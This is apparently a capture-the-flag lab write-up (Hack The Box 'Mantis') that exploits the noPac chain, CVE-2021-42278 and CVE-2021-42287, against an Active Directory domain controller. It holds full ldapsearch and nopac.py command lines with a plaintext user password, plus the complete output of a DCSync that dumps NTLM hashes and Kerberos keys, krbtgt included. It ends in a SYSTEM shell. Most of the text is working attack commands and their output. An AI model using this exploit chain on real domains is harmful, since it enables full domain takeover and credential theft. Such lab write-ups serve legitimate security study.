CVE-2021-42278 + CVE-2021-42287 (noPac)
the scan result confirmed that the target system is vulnerable to the nopac exploit
the cve-2021-42278 + CVE-2021-42287 chain (noPac) works by impersonating a domain controller by faking a computer account with the trailing $ sign
By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ ldapsearch -x -h ldap://htb.local:389 -D james@htb.local -w 'J@m3s_P@ssW0rd!' -b 'DC=HTB,DC=LOCAL' -LLL | grep -i ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10The ms-DS-MachineAccountQuota LDAP attribute defines how many device the user can add.
In this case, it’s the default 10.
ms-DS-MachineAccountQuota can be checked in many different ways
┌──(kali㉿kali)-[~/…/htb/labs/mantis/noPac]
└─$ python3 nopac.py 'htb.local/james:' --impersonate administrator -dc-ip $IP -use-ldap -dump -just-dc
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
password: J@m3s_P@ssW0rd!
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target mantis.htb.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-RIQPBJWSTNI$"
[*] MachineAccount "WIN-RIQPBJWSTNI$" password = @uYgK2vSgNfL
[*] Successfully added machine account WIN-RIQPBJWSTNI$ with password @uYgK2vSgNfL.
[*] WIN-RIQPBJWSTNI$ object = CN=WIN-RIQPBJWSTNI,CN=Computers,DC=htb,DC=local
[*] WIN-RIQPBJWSTNI$ sAMAccountName == mantis
[*] Saving a DC's ticket in mantis.ccache
[*] Reseting the machine account to WIN-RIQPBJWSTNI$
[*] Restored WIN-RIQPBJWSTNI$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_mantis.htb.local.ccache
[*] attempting to del a computer with the name: WIN-RIQPBJWSTNI$
[-] Delete computer WIN-RIQPBJWSTNI$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:22140219fd9432e584a355e54b28ecbb:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e330665e47f7890603b5a96bbb31e23:::
htb.local\james:1103:aad3b435b51404eeaad3b435b51404ee:71b5ea0a10d569ffac56d3b63684b3d2:::
mantis$:1000:aad3b435b51404eeaad3b435b51404ee:e83b7202a2fe29237cbfd4c6644ed048:::
win-riqpbjwstni$:1105:aad3b435b51404eeaad3b435b51404ee:24481ffaa7c036c58475c28e92033304:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:c06d7bb2e780b417445f0f55c52399de2dbd206a383be45d407b376356cd9170
administrator:aes128-cts-hmac-sha1-96:ea5a1c528034eac55c6e97af85773352
administrator:des-cbc-md5:c2d65b4f7abab392
krbtgt:aes256-cts-hmac-sha1-96:fb0175b25239486d1cee94e6fe7f2167017df916981c21ea0542d4460298d18e
krbtgt:aes128-cts-hmac-sha1-96:ddbab1997d4bbd7a6c591f887b739c68
krbtgt:des-cbc-md5:a113768326f10e1a
htb.local\james:aes256-cts-hmac-sha1-96:a5b5099819f72a8b932c8cf10b643fc10fa98f6ef80397c196d3977210846e56
htb.local\james:aes128-cts-hmac-sha1-96:762d8ec29ef72edb6690c52cfe6b91e3
htb.local\james:des-cbc-md5:2085528ca7b67383
mantis$:aes256-cts-hmac-sha1-96:9c70a1943bd655ad175f5cdadf15ffed949e21815c3a4f72f883db4694abb294
mantis$:aes128-cts-hmac-sha1-96:05715f0c529a664dbb967012e56eb08b
mantis$:des-cbc-md5:32cbd06ea7a404ef
win-riqpbjwstni$:aes256-cts-hmac-sha1-96:8eb1f2426f4719b576d981e5eaa1950acca4c85aab75b83dbed70cbd15674d44
win-riqpbjwstni$:aes128-cts-hmac-sha1-96:f0862dacb57093efcb0f2d9ebb161392
win-riqpbjwstni$:des-cbc-md5:7f3e9b31fefb54c8
[*] Cleaning up... noPac exploit complete, leading to DCSync, dumping domain credential hashes Domain Level Compromise
┌──(kali㉿kali)-[~/…/htb/labs/mantis/noPac]
└─$ python3 nopac.py 'htb.local/james:' --impersonate administrator -dc-ip $IP -use-ldap -shell
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
password: J@m3s_P@ssW0rd!
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target mantis.htb.local
[*] will try to impersonate administrator
[*] Already have user administrator ticket for target mantis.htb.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
mantis
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::84ef:aacc:c716:5b9a
link-local ipv6 address . . . . . : fe80::84ef:aacc:c716:5b9a%11
ipv4 address. . . . . . . . . . . : 10.10.10.52
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
10.10.10.2
tunnel adapter isatap.{f163287b-37d4-42ac-8358-59bd4fbfbe46}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : GG